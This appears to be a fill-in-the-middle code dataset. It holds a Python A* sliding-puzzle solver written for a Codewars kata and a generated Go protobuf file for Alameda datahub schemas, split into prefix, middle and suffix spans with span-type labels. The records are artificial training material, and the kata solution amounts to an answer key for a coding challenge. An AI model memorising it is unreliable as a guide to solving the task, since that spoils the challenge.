self.puzzle[i, j].y, self.puzzle[i, j].x = i, j
self.solved[i, j] = 1 + j + self.width*i
self.solved[-1, -1] = 0
# Create paths for all cases
for row in self.puzzle:
[case.get_paths(self.puzzle) for case in row]
def clear(self):
[case.clear() for case in np.ravel(self.puzzle)]
def find_number(self, n):
for row in self.puzzle:
for node in row:
if node.value == n:
return node
return None
def solve_number(self, destination, number, ignore=None, solve=True):
while destination.value != number:
hole = self.find_number(0)
# Finds the number you want to put in Destination
goto = self.find_number(number)
# Finds which adjacent case we should approach it from
adjacent = goto.best_adjacent(self.puzzle, relative_to=destination)
# Finds the shortest path to the adjacent case
path = hole.astar(self, adjacent, goto, ignore)
# Moves to it
for one, two in zip(path, path[1:]):
self.steps.append(two.value)
one.swap(two)
else:
self.steps.append(goto.value)
path[-1].swap(goto)
if solve:
destination.solved = True
return True
def solve_line(self, line, solutions, helper_cases):
# Give it a line and what you want that line to look like
for case, solution in zip(line[:-2], solutions[:-2]):
self.solve_number(case, solution)
# Now the hard solve with line[-2:] and solutions[-2:]
# Ponemos el 4 y el 3 en un lugar seguro
self.solve_number(helper_cases[2], solutions[-1], solve=False)
self.solve_number(helper_cases[3], solutions[-2], solve=False)
self.solve_number(line[-1], solutions[-2], solve=False)
self.solve_number(helper_cases[0], solutions[-1], solve=False)
if line[-2] != self.find_number(0):
|
self.solve_number(line[-2], solutions[-2])
self.solve_number(line[-1], solutions[-1])
return True
def smol_solve(self):
# First solves top row & column, etc, until 2x3 block left
# helper_case[0] is below the last case of the row (row+1, -1)
# helper_case[1] is to the left of helper_case[0]
# We want to reduce up to a 2x2 grid
smallest = 2
for i in range(self.height-smallest):
helper_cases = (self.puzzle[i+1, -1], self.puzzle[i+1, -2],
self.puzzle[i+2, -1], self.puzzle[i+2, -2])
self.solve_line(self.puzzle[i, :], self.solved[i, :], helper_cases)
helper_cases = (self.puzzle[-1, i+1], self.puzzle[-2, i+1],
self.puzzle[-1, i+2], self.puzzle[-2, i+2])
self.solve_line(self.puzzle[i+1:, i], self.solved[i+1:, i], helper_cases)
return True
def final_solve(self, fragment, solution):
# Solves a 2x2 puzzle
for i in range(24):
solution = self.puzzle[-3:, -3:].ravel().tolist()[:-1]
solution = [s.value for s in solution]
if sorted(solution) == solution:
# Done
return True
hole = self.find_number(0)
if i < 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-2, -1]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-2, -2]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-1, -2]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-1, -1]
if i >= 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-1, -2]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-1, -1]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-2, -1]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-2, -2]
self.steps.append(guy.value)
hole.swap(guy)
# print('couldnt find solution')
self.steps = None
def solve(self):
# Solve it until we only have a 2x2 square on the bottom right
self.smol_solve()
# Solve the 2x2 square (first argument is square, second is solution)
self.final_solve(self.puzzle[-3:, -3:].ravel().tolist(),
self.solved[-3:, -3:].ravel().tolist())
print(self.puzzle)
class Case:
def __init__(self, value):
self.value = value
self.solved = False
self.paths = []
self.distance = np.Infinity
self.back = None
def __gt__(self, other):
return self.distance > other.distance
def __repr__(self):
return str(self.value)
@property
def info(self):
return f'Case w/ value {self.value} at ({self.y}, {self.x}).'
def clear(self):
self.distance = np.Infinity
self.back = None
def swap(self, other):
self.value, other.value = other.value, self.value
self.solved, other.solved = other.solved, self.solved
def get_paths(self, puzzle):
height, width = puzzle.shape
if self.y > 0:
self.paths.append(puzzle[self.y-1, self.x])
if self.y < height-1:
self.paths.append(puzzle[self.y+1, self.x])
if self.x > 0:
self.paths.append(puzzle[self.y, self.x-1])
if self.x < width-1:
self.paths.append(puzzle[self.y, self.x+1])
def best_adjacent(self, puzzle, relative_to):
# y1, x1 = relative_to.y, relative_to.x
possible_paths = []
for path in self.paths:
if not path.solved:
# Changed to distance_to
# OLD: possible_paths.append((abs(y1-path.y)+abs(x1-path.x), path))
possible_paths.append((relative_to.distance_to(path), path))
if not possible_paths:
# Error check, shouldn't happen on solvable puzzles
print(f'Could not find any good adjacent cases for {self.y}, {self.x}')
for path in self.paths:
print(f'({path.y}, {path.x}), solved = {path.solved}')
print(puzzle.puzzle)
solution = sorted(possible_paths, key=lambda x: x[0])[0]
return solution[1]
def dijkstra(self, puzzle, destination, number, ignore=None):
'''A* is way more efficient on big maps! Use it instead'''
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance, posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def astar(self, puzzle, destination, number, ignore=None):
# MOVING HOLE(SELF) TO DESTINATION
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
if case == destination:
break
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance_to(destination), posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def distance_to(self, other):
return abs(self.y-other.y)+abs(self.x-other.x)
def slide_puzzle(array):
# Code-execution function
puzzle = Puzzle(array)
puzzle.solve()
return puzzle.steps
# TEST CASE
array = [
[4, 1, 3],
[2, 8, 0],
[7, 6, 5],
]
print(slide_puzzle(array))
| self.solve_number(helper_cases[1], line[-2].value,
ignore=[helper_cases[0], line[-1]], solve=False) | conditional_block |
sliding-puzzle.py | # 1 kyu
# Sliding Puzzle Solver
# https://www.codewars.com/kata/sliding-puzzle-solver/python
import numpy as np
import queue
def compare(a, b):
if a == b:
return 0
if a > b:
return 1
if a < b:
return -1
class Puzzle:
def __init__(self, puzzle):
self.puzzle = np.array(puzzle, dtype=np.object)
self.solved = np.zeros_like(self.puzzle, dtype=int)
self.height, self.width = self.puzzle.shape
self.steps = []
# Build puzzle & solution to compare against:
for i, row in enumerate(self.puzzle):
for j, value in enumerate(row):
self.puzzle[i, j] = Case(value)
self.puzzle[i, j].y, self.puzzle[i, j].x = i, j
self.solved[i, j] = 1 + j + self.width*i
self.solved[-1, -1] = 0
# Create paths for all cases
for row in self.puzzle:
[case.get_paths(self.puzzle) for case in row]
def clear(self):
[case.clear() for case in np.ravel(self.puzzle)]
def find_number(self, n):
for row in self.puzzle:
for node in row:
if node.value == n:
return node
return None
def solve_number(self, destination, number, ignore=None, solve=True):
while destination.value != number:
hole = self.find_number(0)
# Finds the number you want to put in Destination
goto = self.find_number(number)
# Finds which adjacent case we should approach it from
adjacent = goto.best_adjacent(self.puzzle, relative_to=destination)
# Finds the shortest path to the adjacent case
path = hole.astar(self, adjacent, goto, ignore)
# Moves to it
for one, two in zip(path, path[1:]):
self.steps.append(two.value)
one.swap(two)
else:
self.steps.append(goto.value)
path[-1].swap(goto)
if solve:
destination.solved = True
return True
def solve_line(self, line, solutions, helper_cases):
# Give it a line and what you want that line to look like
for case, solution in zip(line[:-2], solutions[:-2]):
self.solve_number(case, solution)
# Now the hard solve with line[-2:] and solutions[-2:]
# Ponemos el 4 y el 3 en un lugar seguro
self.solve_number(helper_cases[2], solutions[-1], solve=False)
self.solve_number(helper_cases[3], solutions[-2], solve=False)
self.solve_number(line[-1], solutions[-2], solve=False)
self.solve_number(helper_cases[0], solutions[-1], solve=False)
if line[-2] != self.find_number(0):
self.solve_number(helper_cases[1], line[-2].value,
ignore=[helper_cases[0], line[-1]], solve=False)
self.solve_number(line[-2], solutions[-2])
self.solve_number(line[-1], solutions[-1])
return True
def smol_solve(self):
# First solves top row & column, etc, until 2x3 block left
# helper_case[0] is below the last case of the row (row+1, -1)
# helper_case[1] is to the left of helper_case[0]
# We want to reduce up to a 2x2 grid
smallest = 2
for i in range(self.height-smallest):
helper_cases = (self.puzzle[i+1, -1], self.puzzle[i+1, -2],
self.puzzle[i+2, -1], self.puzzle[i+2, -2])
self.solve_line(self.puzzle[i, :], self.solved[i, :], helper_cases)
helper_cases = (self.puzzle[-1, i+1], self.puzzle[-2, i+1],
self.puzzle[-1, i+2], self.puzzle[-2, i+2])
self.solve_line(self.puzzle[i+1:, i], self.solved[i+1:, i], helper_cases)
return True
def final_solve(self, fragment, solution):
# Solves a 2x2 puzzle
for i in range(24):
solution = self.puzzle[-3:, -3:].ravel().tolist()[:-1]
solution = [s.value for s in solution]
if sorted(solution) == solution:
# Done
return True
hole = self.find_number(0)
if i < 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-2, -1]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-2, -2]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-1, -2]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-1, -1]
if i >= 12:
# 3 loops one way, 3 loops the other one
if hole.y == self.height-1 and hole.x == self.width-1:
guy = self.puzzle[-1, -2]
if hole.y == self.height-2 and hole.x == self.width-1:
guy = self.puzzle[-1, -1]
if hole.y == self.height-2 and hole.x == self.width-2:
guy = self.puzzle[-2, -1]
if hole.y == self.height-1 and hole.x == self.width-2:
guy = self.puzzle[-2, -2]
self.steps.append(guy.value)
hole.swap(guy)
# print('couldnt find solution')
self.steps = None
def solve(self):
# Solve it until we only have a 2x2 square on the bottom right
self.smol_solve()
# Solve the 2x2 square (first argument is square, second is solution)
self.final_solve(self.puzzle[-3:, -3:].ravel().tolist(),
self.solved[-3:, -3:].ravel().tolist())
print(self.puzzle)
class Case:
def __init__(self, value):
self.value = value
self.solved = False
self.paths = []
self.distance = np.Infinity
self.back = None
def __gt__(self, other):
return self.distance > other.distance
def __repr__(self):
return str(self.value)
@property
def info(self):
return f'Case w/ value {self.value} at ({self.y}, {self.x}).'
def clear(self):
self.distance = np.Infinity
self.back = None
def swap(self, other):
self.value, other.value = other.value, self.value
self.solved, other.solved = other.solved, self.solved
def get_paths(self, puzzle):
height, width = puzzle.shape
if self.y > 0:
self.paths.append(puzzle[self.y-1, self.x])
if self.y < height-1:
self.paths.append(puzzle[self.y+1, self.x])
if self.x > 0:
self.paths.append(puzzle[self.y, self.x-1])
if self.x < width-1:
self.paths.append(puzzle[self.y, self.x+1])
def | (self, puzzle, relative_to):
# y1, x1 = relative_to.y, relative_to.x
possible_paths = []
for path in self.paths:
if not path.solved:
# Changed to distance_to
# OLD: possible_paths.append((abs(y1-path.y)+abs(x1-path.x), path))
possible_paths.append((relative_to.distance_to(path), path))
if not possible_paths:
# Error check, shouldn't happen on solvable puzzles
print(f'Could not find any good adjacent cases for {self.y}, {self.x}')
for path in self.paths:
print(f'({path.y}, {path.x}), solved = {path.solved}')
print(puzzle.puzzle)
solution = sorted(possible_paths, key=lambda x: x[0])[0]
return solution[1]
def dijkstra(self, puzzle, destination, number, ignore=None):
'''A* is way more efficient on big maps! Use it instead'''
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance, posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def astar(self, puzzle, destination, number, ignore=None):
# MOVING HOLE(SELF) TO DESTINATION
# Number = the number we want to put in Destination
# Shortest path to position, ignoring the solved cases and the Number
# It has to ignore Number because else it will displace it and fuck it up
# Basically we take the zero to Destination(which will be right next to Number)
ignore = ignore or []
q = queue.PriorityQueue()
self.distance = 0
q.put((0, self))
while not q.empty():
_, case = q.get()
if case == destination:
break
for posib in case.paths:
if posib.back != case:
if posib != number and not posib.solved and posib not in ignore:
if posib.distance > 1+case.distance:
posib.distance = 1+case.distance
posib.back = case
q.put((posib.distance_to(destination), posib))
node = destination
path = []
while node.back:
path.append(node)
node = node.back
path.append(node)
puzzle.clear()
return list(reversed(path))
def distance_to(self, other):
return abs(self.y-other.y)+abs(self.x-other.x)
def slide_puzzle(array):
# Code-execution function
puzzle = Puzzle(array)
puzzle.solve()
return puzzle.steps
# TEST CASE
array = [
[4, 1, 3],
[2, 8, 0],
[7, 6, 5],
]
print(slide_puzzle(array))
| best_adjacent | identifier_name |
types.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: alameda_api/v1alpha1/datahub/schemas/types.proto
package schemas
import (
fmt "fmt"
common "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/common"
common1 "github.com/containers-ai/api/common"
proto "github.com/golang/protobuf/proto"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
type Table int32
const (
Table_TABLE_UNDEFINED Table = 0
Table_TABLE_APPLICATION Table = 1
Table_TABLE_METRIC Table = 2
Table_TABLE_PLANNING Table = 3
Table_TABLE_PREDICTION Table = 4
Table_TABLE_RESOURCE Table = 5 | 1: "TABLE_APPLICATION",
2: "TABLE_METRIC",
3: "TABLE_PLANNING",
4: "TABLE_PREDICTION",
5: "TABLE_RESOURCE",
6: "TABLE_RECOMMENDATION",
}
var Table_value = map[string]int32{
"TABLE_UNDEFINED": 0,
"TABLE_APPLICATION": 1,
"TABLE_METRIC": 2,
"TABLE_PLANNING": 3,
"TABLE_PREDICTION": 4,
"TABLE_RESOURCE": 5,
"TABLE_RECOMMENDATION": 6,
}
func (x Table) String() string {
return proto.EnumName(Table_name, int32(x))
}
func (Table) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
type Scope int32
const (
Scope_SCOPE_UNDEFINED Scope = 0
Scope_SCOPE_RESOURCE Scope = 1
Scope_SCOPE_APPLICATION Scope = 2
)
var Scope_name = map[int32]string{
0: "SCOPE_UNDEFINED",
1: "SCOPE_RESOURCE",
2: "SCOPE_APPLICATION",
}
var Scope_value = map[string]int32{
"SCOPE_UNDEFINED": 0,
"SCOPE_RESOURCE": 1,
"SCOPE_APPLICATION": 2,
}
func (x Scope) String() string {
return proto.EnumName(Scope_name, int32(x))
}
func (Scope) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
type SchemaMeta struct {
Table Table `protobuf:"varint,1,opt,name=table,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Table" json:"table,omitempty"`
Scope Scope `protobuf:"varint,2,opt,name=scope,proto3,enum=containersai.alameda.v1alpha1.datahub.schemas.Scope" json:"scope,omitempty"`
Category string `protobuf:"bytes,3,opt,name=category,proto3" json:"category,omitempty"`
Type string `protobuf:"bytes,4,opt,name=type,proto3" json:"type,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *SchemaMeta) Reset() { *m = SchemaMeta{} }
func (m *SchemaMeta) String() string { return proto.CompactTextString(m) }
func (*SchemaMeta) ProtoMessage() {}
func (*SchemaMeta) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
func (m *SchemaMeta) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_SchemaMeta.Unmarshal(m, b)
}
func (m *SchemaMeta) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_SchemaMeta.Marshal(b, m, deterministic)
}
func (m *SchemaMeta) XXX_Merge(src proto.Message) {
xxx_messageInfo_SchemaMeta.Merge(m, src)
}
func (m *SchemaMeta) XXX_Size() int {
return xxx_messageInfo_SchemaMeta.Size(m)
}
func (m *SchemaMeta) XXX_DiscardUnknown() {
xxx_messageInfo_SchemaMeta.DiscardUnknown(m)
}
var xxx_messageInfo_SchemaMeta proto.InternalMessageInfo
func (m *SchemaMeta) GetTable() Table {
if m != nil {
return m.Table
}
return Table_TABLE_UNDEFINED
}
func (m *SchemaMeta) GetScope() Scope {
if m != nil {
return m.Scope
}
return Scope_SCOPE_UNDEFINED
}
func (m *SchemaMeta) GetCategory() string {
if m != nil {
return m.Category
}
return ""
}
func (m *SchemaMeta) GetType() string {
if m != nil {
return m.Type
}
return ""
}
type Mesaurement struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
MetricType common.MetricType `protobuf:"varint,2,opt,name=metric_type,json=metricType,proto3,enum=containersai.alameda.v1alpha1.datahub.common.MetricType" json:"metric_type,omitempty"`
Columns []*Column `protobuf:"bytes,3,rep,name=columns,proto3" json:"columns,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Mesaurement) Reset() { *m = Mesaurement{} }
func (m *Mesaurement) String() string { return proto.CompactTextString(m) }
func (*Mesaurement) ProtoMessage() {}
func (*Mesaurement) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{1}
}
func (m *Mesaurement) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Mesaurement.Unmarshal(m, b)
}
func (m *Mesaurement) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Mesaurement.Marshal(b, m, deterministic)
}
func (m *Mesaurement) XXX_Merge(src proto.Message) {
xxx_messageInfo_Mesaurement.Merge(m, src)
}
func (m *Mesaurement) XXX_Size() int {
return xxx_messageInfo_Mesaurement.Size(m)
}
func (m *Mesaurement) XXX_DiscardUnknown() {
xxx_messageInfo_Mesaurement.DiscardUnknown(m)
}
var xxx_messageInfo_Mesaurement proto.InternalMessageInfo
func (m *Mesaurement) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Mesaurement) GetMetricType() common.MetricType {
if m != nil {
return m.MetricType
}
return common.MetricType_METRICS_TYPE_UNDEFINED
}
func (m *Mesaurement) GetColumns() []*Column {
if m != nil {
return m.Columns
}
return nil
}
type Column struct {
Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"`
Required bool `protobuf:"varint,2,opt,name=required,proto3" json:"required,omitempty"`
ColumnTypes common1.ColumnType `protobuf:"varint,3,opt,name=column_types,json=columnTypes,proto3,enum=containersai.common.ColumnType" json:"column_types,omitempty"`
DataTypes common1.DataType `protobuf:"varint,4,opt,name=data_types,json=dataTypes,proto3,enum=containersai.common.DataType" json:"data_types,omitempty"`
XXX_NoUnkeyedLiteral struct{} `json:"-"`
XXX_unrecognized []byte `json:"-"`
XXX_sizecache int32 `json:"-"`
}
func (m *Column) Reset() { *m = Column{} }
func (m *Column) String() string { return proto.CompactTextString(m) }
func (*Column) ProtoMessage() {}
func (*Column) Descriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{2}
}
func (m *Column) XXX_Unmarshal(b []byte) error {
return xxx_messageInfo_Column.Unmarshal(m, b)
}
func (m *Column) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
return xxx_messageInfo_Column.Marshal(b, m, deterministic)
}
func (m *Column) XXX_Merge(src proto.Message) {
xxx_messageInfo_Column.Merge(m, src)
}
func (m *Column) XXX_Size() int {
return xxx_messageInfo_Column.Size(m)
}
func (m *Column) XXX_DiscardUnknown() {
xxx_messageInfo_Column.DiscardUnknown(m)
}
var xxx_messageInfo_Column proto.InternalMessageInfo
func (m *Column) GetName() string {
if m != nil {
return m.Name
}
return ""
}
func (m *Column) GetRequired() bool {
if m != nil {
return m.Required
}
return false
}
func (m *Column) GetColumnTypes() common1.ColumnType {
if m != nil {
return m.ColumnTypes
}
return common1.ColumnType_COLUMNTYPE_UDEFINED
}
func (m *Column) GetDataTypes() common1.DataType {
if m != nil {
return m.DataTypes
}
return common1.DataType_DATATYPE_UNDEFINED
}
func init() {
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Table", Table_name, Table_value)
proto.RegisterEnum("containersai.alameda.v1alpha1.datahub.schemas.Scope", Scope_name, Scope_value)
proto.RegisterType((*SchemaMeta)(nil), "containersai.alameda.v1alpha1.datahub.schemas.SchemaMeta")
proto.RegisterType((*Mesaurement)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Mesaurement")
proto.RegisterType((*Column)(nil), "containersai.alameda.v1alpha1.datahub.schemas.Column")
}
func init() {
proto.RegisterFile("alameda_api/v1alpha1/datahub/schemas/types.proto", fileDescriptor_01194bf23370964f)
}
var fileDescriptor_01194bf23370964f = []byte{
// 522 bytes of a gzipped FileDescriptorProto
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0x9c, 0x54, 0xcd, 0x6a, 0xdb, 0x4c,
0x14, 0xfd, 0xe4, 0xbf, 0xcf, 0xbe, 0x0e, 0xae, 0x3a, 0x4d, 0x41, 0x18, 0x4a, 0x8d, 0x57, 0x26,
0x10, 0xa9, 0x76, 0x5b, 0xe8, 0xa2, 0x1b, 0x5b, 0x56, 0x83, 0x8a, 0x25, 0x99, 0xb1, 0xb2, 0x68,
0x37, 0x66, 0x2c, 0x0f, 0xb1, 0xc0, 0xfa, 0xa9, 0x66, 0x5c, 0xf0, 0xc3, 0xf4, 0x45, 0xfa, 0x0e,
0xdd, 0xf5, 0x81, 0x8a, 0x66, 0xc6, 0x4a, 0x02, 0xa1, 0x24, 0xdd, 0xdd, 0x39, 0xcc, 0x39, 0xf7,
0x9c, 0xcb, 0x9d, 0x81, 0x37, 0x64, 0x4f, 0x12, 0xba, 0x25, 0x6b, 0x92, 0xc7, 0xd6, 0xf7, 0x31,
0xd9, 0xe7, 0x3b, 0x32, 0xb6, 0xb6, 0x84, 0x93, 0xdd, 0x61, 0x63, 0xb1, 0x68, 0x47, 0x13, 0xc2,
0x2c, 0x7e, 0xcc, 0x29, 0x33, 0xf3, 0x22, 0xe3, 0x19, 0xba, 0x8c, 0xb2, 0x94, 0x93, 0x38, 0xa5,
0x05, 0x23, 0xb1, 0xa9, 0xe8, 0xe6, 0x89, 0x6a, 0x2a, 0xaa, 0xa9, 0xa8, 0xfd, 0xf1, 0x5f, 0x1b,
0x44, 0x59, 0x92, 0x64, 0xa9, 0x95, 0x50, 0x5e, 0xc4, 0x91, 0xea, 0xd0, 0x47, 0x0a, 0xbd, 0xd3,
0x75, 0xf8, 0x5b, 0x03, 0x58, 0x09, 0x49, 0x8f, 0x72, 0x82, 0x3e, 0x43, 0x93, 0x93, 0xcd, 0x9e,
0x1a, 0xda, 0x40, 0x1b, 0xf5, 0x26, 0xef, 0xcc, 0x27, 0x99, 0x32, 0xc3, 0x92, 0x8b, 0xa5, 0x44,
0xa9, 0xc5, 0xa2, 0x2c, 0xa7, 0x46, 0xed, 0x9f, 0xb4, 0x56, 0x25, 0x17, 0x4b, 0x09, 0xd4, 0x87,
0x76, 0x44, 0x38, 0xbd, 0xc9, 0x8a, 0xa3, 0x51, 0x1f, 0x68, 0xa3, 0x0e, 0xae, 0xce, 0x08, 0x41,
0xa3, 0x4c, 0x64, 0x34, 0x04, 0x2e, 0xea, 0xe1, 0x2f, 0x0d, 0xba, 0x1e, 0x65, 0xe4, 0x50, 0xd0,
0x84, 0xa6, 0xbc, 0xbc, 0x93, 0x92, 0x44, 0xc6, 0xea, 0x60, 0x51, 0xa3, 0x2f, 0xd0, 0x95, 0xf3,
0x59, 0x0b, 0xba, 0x74, 0xf9, 0xe1, 0x91, 0x2e, 0xe5, 0x28, 0x4d, 0x4f, 0x08, 0x84, 0xc7, 0x9c,
0x62, 0x48, 0xaa, 0x1a, 0x05, 0xf0, 0x7f, 0x94, 0xed, 0x0f, 0x49, 0xca, 0x8c, 0xfa, 0xa0, 0x3e,
0xea, 0x4e, 0xde, 0x3f, 0x31, 0xbc, 0x2d, 0xd8, 0xf8, 0xa4, 0x32, 0xfc, 0xa9, 0x41, 0x4b, 0x62,
0x0f, 0x46, 0xe9, 0x43, 0xbb, 0xa0, 0xdf, 0x0e, 0x71, 0x41, 0xb7, 0x22, 0x47, 0x1b, 0x57, 0x67,
0x34, 0x83, 0x33, 0xa9, 0x22, 0x62, 0x32, 0x31, 0xbe, 0xde, 0xe4, 0xf5, 0x7d, 0x43, 0x2a, 0x8e,
0x6c, 0x21, 0xe2, 0x74, 0xa3, 0xaa, 0x66, 0xe8, 0x23, 0x40, 0xe9, 0x50, 0x29, 0x34, 0x84, 0xc2,
0xab, 0x07, 0x15, 0xe6, 0x84, 0x13, 0xc1, 0xef, 0x6c, 0x55, 0xc5, 0x2e, 0x7e, 0x68, 0xd0, 0x14,
0x9b, 0x81, 0x5e, 0xc0, 0xb3, 0x70, 0x3a, 0x5b, 0x38, 0xeb, 0x6b, 0x7f, 0xee, 0x7c, 0x72, 0x7d,
0x67, 0xae, 0xff, 0x87, 0x5e, 0xc2, 0x73, 0x09, 0x4e, 0x97, 0xcb, 0x85, 0x6b, 0x4f, 0x43, 0x37,
0xf0, 0x75, 0x0d, 0xe9, 0x70, 0x26, 0x61, 0xcf, 0x09, 0xb1, 0x6b, 0xeb, 0x35, 0x84, 0xa0, 0x27,
0x91, 0xe5, 0x62, 0xea, 0xfb, 0xae, 0x7f, 0xa5, 0xd7, 0xd1, 0x39, 0xe8, 0x0a, 0xc3, 0xce, 0xdc,
0xb5, 0x05, 0xb7, 0x71, 0x7b, 0x13, 0x3b, 0xab, 0xe0, 0x1a, 0xdb, 0x8e, 0xde, 0x44, 0x06, 0x9c,
0x9f, 0x30, 0x3b, 0xf0, 0x3c, 0xc7, 0x9f, 0xcb, 0x4e, 0xad, 0x8b, 0x2b, 0x68, 0x8a, 0x65, 0x2b,
0xed, 0xad, 0xec, 0x60, 0x79, 0xdf, 0x1e, 0x82, 0x9e, 0x04, 0x2b, 0x2d, 0xad, 0xb4, 0x2c, 0xb1,
0xbb, 0x96, 0x6b, 0x33, 0xfb, 0xeb, 0xf4, 0x26, 0xe6, 0x6a, 0x3d, 0xac, 0xdb, 0xf1, 0x5c, 0x92,
0xd8, 0x2a, 0x9f, 0xe9, 0x63, 0xfe, 0x84, 0x4d, 0x4b, 0x3c, 0xcc, 0xb7, 0x7f, 0x02, 0x00, 0x00,
0xff, 0xff, 0xcd, 0x69, 0x6a, 0x34, 0x42, 0x04, 0x00, 0x00,
} | Table_TABLE_RECOMMENDATION Table = 6
)
var Table_name = map[int32]string{
0: "TABLE_UNDEFINED", | random_line_split |
types.pb.go | // Code generated by protoc-gen-go. DO NOT EDIT.
// source: alameda_api/v1alpha1/datahub/schemas/types.proto
package schemas
import (
fmt "fmt"
common "github.com/containers-ai/api/alameda_api/v1alpha1/datahub/common"
common1 "github.com/containers-ai/api/common"
proto "github.com/golang/protobuf/proto"
math "math"
)
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.ProtoPackageIsVersion3 // please upgrade the proto package
type Table int32
const (
Table_TABLE_UNDEFINED Table = 0
Table_TABLE_APPLICATION Table = 1
Table_TABLE_METRIC Table = 2
Table_TABLE_PLANNING Table = 3
Table_TABLE_PREDICTION Table = 4
Table_TABLE_RESOURCE Table = 5
Table_TABLE_RECOMMENDATION Table = 6
)
var Table_name = map[int32]string{
0: "TABLE_UNDEFINED",
1: "TABLE_APPLICATION",
2: "TABLE_METRIC",
3: "TABLE_PLANNING",
4: "TABLE_PREDICTION",
5: "TABLE_RESOURCE",
6: "TABLE_RECOMMENDATION",
}
var Table_value = map[string]int32{
"TABLE_UNDEFINED": 0,
"TABLE_APPLICATION": 1,
"TABLE_METRIC": 2,
"TABLE_PLANNING": 3,
"TABLE_PREDICTION": 4,
"TABLE_RESOURCE": 5,
"TABLE_RECOMMENDATION": 6,
}
func (x Table) String() string {
return proto.EnumName(Table_name, int32(x))
}
func (Table) EnumDescriptor() ([]byte, []int) {
return fileDescriptor_01194bf23370964f, []int{0}
}
type Scope int32
const (
Scope_SCOPE_UNDEFINED Scope = 0
Scope_SCOPE_RESOURCE Scope = 1
Scope_SCOPE_APPLICATION Scope = 2
)
var Scope_name = map[int32]string{
0: "SCOPE_UNDEFINED",
1: "SCOPE_RESOURCE",
2: "SCOPE_APPLICATION",
}
var Scope_value = map[string]int32{
"SCOPE_UNDEFINED": 0,
"SCOPE_RESOURCE": 1,
"SCOPE_APPLICATION": 2,
}
func (x Scope) String() string {
return proto.EnumName(Scope_name, int32(x))
}
